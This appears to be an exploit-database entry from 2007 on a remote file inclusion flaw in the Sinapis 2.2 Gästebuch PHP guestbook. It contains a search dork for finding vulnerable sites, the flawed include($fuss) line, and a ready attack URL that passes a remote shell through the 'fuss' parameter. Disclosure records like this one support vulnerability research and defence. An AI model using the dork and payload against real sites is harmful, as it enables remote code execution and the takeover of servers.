header-logo
Suggest Exploit
vendor:
Sinapis Gästebuch
by:
kezzap66345
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: Sinapis Gästebuch
Affected Version From: Sinapis 2.2
Affected Version To: Sinapis 2.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sinapis 2.2 Gastebuch

The Sinapis 2.2 Gastebuch script is vulnerable to Remote File Inclusion (RFI) attack. The vulnerability allows an attacker to include a remote file hosted on a malicious server, which can lead to remote code execution or other malicious activities.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization techniques. It is recommended to update to the latest version of the script that includes security patches.
Source

Exploit-DB raw data:

Sinapis 2.2 Gastebuch

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20Gästebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="inurl:sinagb.php"
*****************
ERROR:

if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);}       <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinagb.php?fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

# milw0rm.com [2007-02-23]